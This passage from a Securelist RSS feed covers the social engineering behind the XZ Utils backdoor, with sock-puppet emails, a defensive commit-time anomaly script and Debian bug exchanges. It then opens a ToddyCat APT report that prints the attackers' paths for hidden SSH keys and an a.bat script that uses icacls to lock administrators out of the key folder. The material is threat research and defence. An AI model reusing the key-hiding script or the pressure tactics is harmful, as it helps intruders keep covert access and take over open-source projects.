764. <p>This pull request is the Jansen identity&#8217;s only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in its distribution. The identity resurfaced in a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian bug report</a> on March 25, 2024, creating an opportunity to generate urgency around including the backdoored code in the Debian distribution.</p>
  765. <h2 id="jia-tan-identity-and-activity">Jia Tan Identity and Activity</h2>
766. <p>The Jia Cheong Tan (JiaT75) GitHub account, which inserted the malicious backdoor code after eventually being promoted to co-maintainer of XZ Utils, was created on January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022:</p>
  767. <ul>
  768. <li>oss-fuzz</li>
  769. <li>cpp-docs</li>
  770. <li>wasmtime</li>
  771. <li>xz</li>
  772. </ul>
  773. <p>These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.</p>
774. <p>The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list and consisted of nothing more than adding an editor config file. Following this initial innocuous addition, over the next two years JiaT75 <a href="https://git.tukaani.org/?p=xz.git;a=search;h=HEAD;pg=4;s=jia+tan;st=author" target="_blank" rel="noopener">authored</a> hundreds of changes for the XZ project.</p>
  775. <p>Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias &#8220;<a href="https://x.com/birchb0y/status/1773871381890924872" target="_blank" rel="noopener">Alden</a>&#8221; posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024.</p>
  776. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112480" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg" alt="" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-300x200.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-768x512.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-525x350.jpg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-740x493.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-420x280.jpg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-800x533.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
777. <p>The time differences for the malicious commits are noticeable. What might this anomaly suggest? We speculate on several possibilities:</p>
  778. <ul>
  779. <li>the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.</li>
  780. <li>the JiaT75 individual contributor was rushed to commit the malicious backdoor code.</li>
  781. <li>the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.</li>
  782. </ul>
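<p>The commit-time anomaly described above is something a reviewer can check mechanically against any repository&#8217;s history. The following is an added example, not code from the Securelist article or from the XZ project: it takes <code>git log --format='%h %aI'</code> output, normalizes every timestamp to UTC (the offset git records is whatever the author&#8217;s machine declared, so it is untrustworthy on its own), builds the hour-of-day profile of the author&#8217;s earlier commits, and flags later commits that fall more than two hours from any hour the author has previously worked in. The log lines, hashes, cutoff date and time offsets below are constructed for illustration and do not reproduce the real XZ history.</p>

```python
"""Flag commits whose UTC time of day falls outside an author's established
working-hour profile. Added example, not from the Securelist article or the
XZ project: the log lines are constructed, the hashes are fake, and the
offsets/hours do not reproduce the real XZ history."""
from collections import Counter
from datetime import datetime, timezone

# Constructed `git log --format='%h %aI'` output. The +08:00 offset is whatever
# the author's machine declared; git records it unverified, so the analysis
# normalizes to UTC before comparing hours. Baseline commits sit between
# 10:00 and 17:59 UTC; three of the later commits fall around 01:00-03:00 UTC.
SAMPLE_LOG = """\
0a1b2c3 2023-05-02T18:10:44+08:00
1b2c3d4 2023-05-09T19:32:01+08:00
2c3d4e5 2023-05-16T20:05:17+08:00
3d4e5f6 2023-05-23T21:48:09+08:00
4e5f6a7 2023-06-06T22:15:33+08:00
5f6a7b8 2023-06-13T23:02:58+08:00
6a7b8c9 2023-06-20T00:41:20+08:00
7b8c9d0 2023-07-04T01:27:05+08:00
8c9d0e1 2023-08-01T19:55:12+08:00
9d0e1f2 2023-09-12T22:30:46+08:00
dd44ee5 2024-01-10T20:20:20+08:00
aa11bb2 2024-02-20T10:03:11+08:00
bb22cc3 2024-02-27T09:41:50+08:00
cc33dd4 2024-03-05T11:15:27+08:00
"""

# Hypothetical boundary: commits before it form the author's established
# pattern; commits after it are checked against that pattern.
CUTOFF = datetime(2024, 1, 1, tzinfo=timezone.utc)


def parse_git_log(text):
    """Return [(short_sha, aware UTC datetime), ...] from '%h %aI' lines."""
    commits = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        sha, stamp = line.split()
        when = datetime.fromisoformat(stamp).astimezone(timezone.utc)
        commits.append((sha, when))
    return commits


def split_by_cutoff(commits, cutoff):
    """Partition commits into (baseline, candidates) around a cutoff date."""
    baseline = [c for c in commits if cutoff > c[1]]
    candidates = [c for c in commits if c[1] >= cutoff]
    return baseline, candidates


def hour_profile(commits):
    """Histogram of commits per UTC hour of day."""
    return Counter(when.hour for _, when in commits)


def circular_hour_distance(a, b):
    """Distance between two hours on a 24-hour clock (23 and 1 are 2 apart)."""
    d = abs(a - b) % 24
    return min(d, 24 - d)


def out_of_profile(candidates, baseline, window=2):
    """Short SHAs of candidate commits whose UTC hour is more than `window`
    hours away from every hour in which the baseline contains a commit."""
    active_hours = set(hour_profile(baseline))
    return [
        sha
        for sha, when in candidates
        if all(circular_hour_distance(when.hour, h) > window for h in active_hours)
    ]


if __name__ == "__main__":
    baseline, candidates = split_by_cutoff(parse_git_log(SAMPLE_LOG), CUTOFF)
    print("baseline hours (UTC):", sorted(hour_profile(baseline).items()))
    print("out-of-profile commits:", out_of_profile(candidates, baseline))
```

<p>Against real history, feed it <code>git log --author=... --format='%h %aI'</code> and pick a cutoff that precedes the commits under suspicion. A clean result is not proof of anything: the timestamp is author-controlled, and an account operated by a team can simply keep to the established hours. The check is useful precisely because the XZ commits did not.</p>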
  783. <p>Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.</p>
  784. <h2 id="summer-2022-pressure-to-add-a-maintainer">Summer 2022 Pressure to Add a Maintainer</h2>
  785. <p>Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.</p>
  786. <table width="100%">
  787. <tbody>
  788. <tr>
  789. <td width="22%"><strong>Name</strong></td>
  790. <td width="22%"><strong>GitHub Account</strong></td>
  791. <td width="34%"><strong>Email</strong></td>
  792. <td width="22%"><strong>Creation</strong></td>
  793. </tr>
  794. <tr>
  795. <td>Jia Tan/Jia Cheong Tan</td>
  796. <td>JiaT75</td>
  797. <td>jiat0218@gmail.com</td>
  798. <td>January 26, 2021</td>
  799. </tr>
  800. <tr>
  801. <td>Dennis Ens</td>
  802. <td>&#8211;</td>
  803. <td>dennis3ns@gmail.com</td>
  804. <td>&#8211;</td>
  805. </tr>
  806. <tr>
  807. <td>Jigar Kumar</td>
  808. <td>&#8211;</td>
  809. <td>jigarkumar17@protonmail.com</td>
  810. <td>&#8211;</td>
  811. </tr>
  812. </tbody>
  813. </table>
814. <p>If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html" target="_blank" rel="noopener">superficial code patch</a> on October 29, 2021, nine months after the GitHub account was created. This initial contribution is harmless, but establishes the identity within the open-source project.</p>
  815. <p>A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.</p>
  816. <table width="100%">
  817. <tbody>
  818. <tr>
  819. <td width="40%">Wed, 27 Apr 2022 11:42:57 -0700</td>
  820. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00555.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  821. </tr>
  822. <tr>
  823. <td colspan="2">Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.</td>
  824. </tr>
  825. <tr>
  826. <td>Thu, 28 Apr 2022 10:10:48 -0700</td>
  827. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  828. </tr>
  829. <tr>
  830. <td colspan="2">Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There<br />
  831. is no reason to think anything is coming soon.</td>
  832. </tr>
  833. <tr>
  834. <td>Fri, 27 May 2022 10:49:47 -0700</td>
  835. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  836. </tr>
  837. <tr>
  838. <td colspan="2">Over 1 month and no closer to being merged. Not a suprise.</td>
  839. </tr>
  840. <tr>
  841. <td>Tue, 07 Jun 2022 09:00:18 -0700</td>
  842. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  843. </tr>
  844. <tr>
  845. <td colspan="2">Progress will not happen until there is new maintainer. XZ for C has sparse<br />
  846. commit log too. Dennis you are better off waiting until new maintainer happens<br />
  847. or fork yourself. Submitting patches here has no purpose these days. The<br />
  848. current maintainer lost interest or doesn&#8217;t care to maintain anymore. It is sad<br />
  849. to see for a repo like this.</td>
  850. </tr>
  851. <tr>
  852. <td>Tue, 14 Jun 2022 11:16:07 -0700</td>
  853. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  854. </tr>
  855. <tr>
  856. <td colspan="2">With your current rate, I very doubt to see 5.4.0 release this year. The only<br />
  857. progress since april has been small changes to test code. You ignore the many<br />
  858. patches bit rotting away on this mailing list. Right now you choke your repo.<br />
  859. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?</td>
  860. </tr>
  861. <tr>
  862. <td>Wed, 22 Jun 2022 10:05:06 -0700</td>
  863. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  864. </tr>
  865. <tr>
  866. <td colspan="2">&#8220;Is there any progress on this? Jia I see you have recent commits. Why can&#8217;t you<br />
  867. commit this yourself?&#8221;</td>
  868. </tr>
  869. </tbody>
  870. </table>
  871. <p>The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: &#8220;Dennis you are better off waiting until new maintainer happens or fork yourself.&#8221;</p>
  872. <table width="100%">
  873. <tbody>
  874. <tr>
  875. <td width="40%">Thu, 19 May 2022 12:26:03 -0700</td>
  876. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html" target="_blank" rel="noopener">XZ for Java</a></td>
  877. </tr>
  878. <tr>
  879. <td colspan="2">Is XZ for Java still maintained? I asked a question here a week ago<br />
  880. and have not heard back. When I view the git log I can see it has not<br />
  881. updated in over a year. I am looking for things like multithreaded<br />
  882. encoding / decoding and a few updates that Brett Okken had submitted<br />
  883. (but are still waiting for merge). Should I add these things to only<br />
  884. my local version, or is there a plan for these things in the future?</td>
  885. </tr>
  886. <tr>
  887. <td>Tue, 21 Jun 2022 13:24:47 -0700</td>
  888. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  889. </tr>
  890. <tr>
  891. <td colspan="2">I am sorry about your mental health issues, but its important to be<br />
  892. aware of your own limits. I get that this is a hobby project for all<br />
  893. contributors, but the community desires more. Why not pass on<br />
  894. maintainership for XZ for C so you can give XZ for Java more<br />
  895. attention? Or pass on XZ for Java to someone else to focus on XZ for<br />
  896. C? Trying to maintain both means that neither are maintained well.</td>
  897. </tr>
  898. </tbody>
  899. </table>
  900. <p>Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:</p>
  901. <ul>
902. <li>In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.</li>
903. <li>In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.</li>
  904. <li>In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.</li>
  905. </ul>
  906. <h2 id="spring-2024-pressure-to-import-backdoored-code-to-debian">Spring 2024 Pressure to Import Backdoored Code to Debian</h2>
907. <p>Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code into their distribution in March 2024. The Hans Jansen identity created a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian bug report</a> on March 25, 2024 to create urgency around including the backdoored code: &#8220;Dear mentors, I am looking for a sponsor for my package &#8220;xz-utils&#8221;.&#8221;</p>
  908. <table width="100%">
  909. <tbody>
  910. <tr>
  911. <td width="50%"><strong>Name</strong></td>
  912. <td width="50%"><strong>Email address</strong></td>
  913. </tr>
  914. <tr>
  915. <td>Hans Jansen</td>
  916. <td>hansjansen162@outlook.com</td>
  917. </tr>
  918. <tr>
  919. <td>krygorin4545</td>
  920. <td>krygorin4545@proton.me</td>
  921. </tr>
  922. <tr>
  923. <td>misoeater91@tutamail.com</td>
  924. <td>misoeater91@tutamail.com</td>
  925. </tr>
  926. </tbody>
  927. </table>
  928. <p>The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:</p>
  929. <table>
  930. <tbody>
  931. <tr>
  932. <td>Date: Tue, 26 Mar 2024 19:27:47 +0000</td>
  933. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
  934. </tr>
  935. <tr>
  936. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=17">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression utilities</a></td>
  937. </tr>
  938. <tr>
  939. <td colspan="2">Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work</td>
  940. </tr>
  941. <tr>
  942. <td>Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET)</td>
  943. <td>From: misoeater91@tutamail.com</td>
  944. </tr>
  945. <tr>
  946. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=22">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression</a></td>
  947. </tr>
  948. <tr>
  949. <td colspan="2">I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!</td>
  950. </tr>
  951. </tbody>
  952. </table>
  953. <p>The code changes received pushback from Debian contributors:</p>
  954. <table>
  955. <tbody>
  956. <tr>
  957. <td>Date: Tue, 26 Mar 2024 22:11:19 +0000 (UTC)</td>
  958. <td>From: Thorsten Glaser &lt;tg@debian.org&gt;</td>
  959. </tr>
  960. <tr>
  961. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=27">Subject: new upstream versions as NMU vs. xz maintenance</a></td>
  962. </tr>
  963. <tr>
964. <td colspan="2">Very much *not* a fan of NMUs doing large changes such as<br />
965. new upstream versions. But this does give us the question, what&#8217;s up with the<br />
966. maintenance of xz-utils? Same as with the lack of security<br />
967. uploads of git, which you also maintain, are you active?</td>
  968. </tr>
  969. <tr>
  970. <td colspan="2">Are you well?</td>
  971. </tr>
  972. </tbody>
  973. </table>
  974. <p>To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:</p>
  975. <table>
  976. <tbody>
  977. <tr>
  978. <td>Date: Wed, 27 Mar 2024 12:46:32 +0000</td>
  979. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
  980. </tr>
  981. <tr>
  982. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708#37">Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance</a></td>
  983. </tr>
  984. <tr>
  985. <td colspan="2">Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn&#8217;t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (&lt;https://bugzilla.redhat.com/show_bug.cgi?id=2267598&gt;). Fixing a valgrind break across many apps throughout Debian is the priority here.</td>
  986. </tr>
  987. </tbody>
  988. </table>
  989. <h2 id="what-nexzt">What NeXZt?</h2>
  990. <p>Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at <a href="https://securelist.com/webinars/sas-2021-time-to-make-the-donuts/" target="_blank" rel="noopener"> prior SAS events [registration required]</a>, distilling an assessment into a manageable table.</p>
991. <p>Unfortunately, we expect more open-source project incidents like the XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified <a href="https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/" target="_blank" rel="noopener">similar social engineering-driven incidents</a> in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.</p>
  992. ]]></content:encoded>
  993. <wfw:commentRss>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/feed/</wfw:commentRss>
  994. <slash:comments>2</slash:comments>
  995. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-scaled.jpg" width="2668" height="1499"><media:keywords>full</media:keywords></media:content>
  996. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-1024x575.jpg" width="1024" height="575"><media:keywords>large</media:keywords></media:content>
  997. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  998. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  999. </item>
  1000. <item>
  1001. <title>ToddyCat is making holes in your infrastructure</title>
  1002. <link>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/</link>
  1003. <comments>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/#comments</comments>
  1004. <dc:creator><![CDATA[Andrey Gunkin, Alexander Fedotov, Natalya Shornikova]]></dc:creator>
  1005. <pubDate>Mon, 22 Apr 2024 10:00:00 +0000</pubDate>
  1006. <category><![CDATA[APT reports]]></category>
  1007. <category><![CDATA[APT]]></category>
  1008. <category><![CDATA[Cyber espionage]]></category>
  1009. <category><![CDATA[Data theft]]></category>
  1010. <category><![CDATA[SSH]]></category>
  1011. <category><![CDATA[Targeted attacks]]></category>
  1012. <category><![CDATA[ToddyCat]]></category>
  1013. <category><![CDATA[VPN]]></category>
  1014. <category><![CDATA[WhatsApp]]></category>
  1015. <category><![CDATA[APT (Targeted attacks)]]></category>
  1016. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112443</guid>
  1017.  
  1018. <description><![CDATA[We continue to report on the APT group ToddyCat. This time, we’ll talk about traffic tunneling, constant access to a target infrastructure and data extraction from hosts.]]></description>
  1019. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We continue covering the activities of the APT group <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener"><strong>ToddyCat</strong></a>. In our <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">previous article</a>, we described tools for collecting and exfiltrating files (<strong>LoFiSe</strong> and <strong>PcExter</strong>). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.</p>
  1020. <p><strong>ToddyCat </strong>is an <a href="https://encyclopedia.kaspersky.ru/glossary/apt-advanced-persistent-threats/" target="_blank" rel="noopener">APT</a> group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group&#8217;s main goals is to steal sensitive information from hosts.</p>
1021. <p>During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor the systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have already compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected to the hosts and transferred and ran all required tools with the help of <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" target="_blank" rel="noopener">PsExec</a> or <a href="https://github.com/fortra/impacket" target="_blank" rel="noopener">Impacket</a>.</p>
  1022. <h2 id="tools-for-traffic-tunneling">Tools for traffic tunneling</h2>
1023. <p>Having several tunnels into the infected infrastructure, implemented with different tools, allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.</p>
  1024. <h3 id="reverse-ssh-tunnel">Reverse SSH Tunnel</h3>
  1025. <p>One way to gain access to remote network services is to create a reverse SSH tunnel.</p>
  1026. <p>Attackers use several files to launch a reverse SSH tunnel:</p>
  1027. <ol>
  1028. <li>The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it</li>
1029. <li>An OpenSSH private key file</li>
  1030. <li>The &#8220;<strong>a.bat</strong>&#8221; script to hide the private key file</li>
  1031. </ol>
1032. <p>The attackers transferred all files to the target host via <strong>SMB </strong>with the help of shared folders <strong>(<a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">T1021.002: Remote Services: SMB/Windows Admin Shares</a>)</strong>.</p>
  1033. <p>The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.</p><pre class="crayon-plain-tag">C:\program files\OpenSSH\ssh.exe
  1034. C:\programdata\sshd\ssh.exe
  1035. C:\programdata\ssh\ssh.exe</pre><p>
  1036. The private key files required for establishing a connection to the remote server were copied to the following paths.</p><pre class="crayon-plain-tag">C:\Windows\AppReadiness\read.ini
  1037. C:\Windows\AppReadiness\data.dat
  1038. C:\Windows\AppReadiness\log.dat
  1039. C:\Windows\AppReadiness\value.dat</pre><p>
1040. <strong>OpenSSH </strong>private key files are normally created without an extension, but they can be given the extension .key or similar. In this case, the attackers used .ini and .dat extensions for private key files, evidently to hide their true purpose: files like that look less suspicious in a directory listing than .key files or files without an extension.</p>
  1041. <p>After the private key files have been copied to the <strong>AppReadiness </strong>folder, the adversary copies and runs an <strong>a.bat</strong> script. In the attacked systems, it was found mostly in temporary directories or in users&#8217; shared folders.</p><pre class="crayon-plain-tag">c:\users\public\a.bat</pre><p>
  1042. This file contains the following commands.</p><pre class="crayon-plain-tag">@echo off
  1043. ::# Set Key File Variable:
  1044.  
  1045. Set Key="C:\Windows\AppReadiness"
  1046.  
  1047. takeown /f "%Key%"
  1048. icacls "%Key%" /remove "BUILTIN\Administrators" &gt; "%temp%\a.txt"
  1049. icacls "%Key%" /remove "Administrators" &gt;&gt; "%temp%\a.txt"
  1050. icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" &gt;&gt; "%temp%\a.txt"
  1051. icacls "%Key%" /remove "CREATOR OWNER" &gt;&gt; "%temp%\a.txt"
  1052. icacls "%Key%" /remove "BUILTIN\Users" &gt;&gt; "%temp%\a.txt"
  1053. icacls "%Key%" /remove "Users" &gt;&gt; "%temp%\a.txt"
  1054. icacls "%Key%" &gt;&gt; "%temp%\a.txt"
  1055.  
  1056. ::# Remove Variable:
  1057. set "Key="</pre><p>
  1058. In Windows, <strong>C:\Windows\AppReadiness</strong> is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.</p>
  1059. <div id="attachment_112447" style="width: 813px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112447" class="size-full wp-image-112447" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" alt="The icacls command output for the AppReadiness folder with default values" width="803" height="167" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png 803w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-300x62.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-768x160.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-800x166.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-740x154.png 740w" sizes="(max-width: 803px) 100vw, 803px" /></a><p id="caption-attachment-112447" class="wp-caption-text">The icacls command output for the AppReadiness folder with default values</p></div>
  1060. <p>The image above shows the default permissions for this folder:</p>
  1061. <ul>
  1062. <li>Administrators and system: full permissions</li>
  1063. <li>Authenticated users: read-only permissions</li>
  1064. </ul>
  1065. <p>This means that regular users can view the contents of the folder.</p>
  1066. <p>The <strong>a.bat</strong> script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for <strong>C:\Windows\AppReadiness</strong> after the script has run:</p>
  1067. <div id="attachment_112448" style="width: 803px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112448" class="size-full wp-image-112448" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" alt="The icacls command output for the AppReadiness folder after a.bat script has executed" width="793" height="101" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png 793w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-300x38.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-768x98.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-740x94.png 740w" sizes="(max-width: 793px) 100vw, 793px" /></a><p id="caption-attachment-112448" class="wp-caption-text">The icacls command output for the AppReadiness folder after a.bat script has executed</p></div>
  1068. <p>Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a &#8220;no permission&#8221; error.</p>
